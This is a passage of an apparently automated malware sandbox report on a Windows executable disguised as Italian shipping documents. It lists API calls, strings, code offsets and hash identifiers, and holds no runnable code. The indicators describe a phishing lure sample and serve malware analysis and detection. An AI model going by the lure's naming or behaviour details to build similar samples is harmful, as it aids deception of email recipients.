                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                        APIs
                        Strings
                        • ^B, xrefs: 00433248
                        • C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, xrefs: 0043324B
                        Similarity
                        • API ID: _wcsncpy
                        • String ID: ^B$C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                        • API String ID: 1735881322-2708761414
                        • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                        • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                        • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                        • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                        • PostMessageW.USER32(00000000), ref: 00441C05
                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                        Strings
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                        APIs
                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Message_doexit
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 1993061046-4017498283
                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D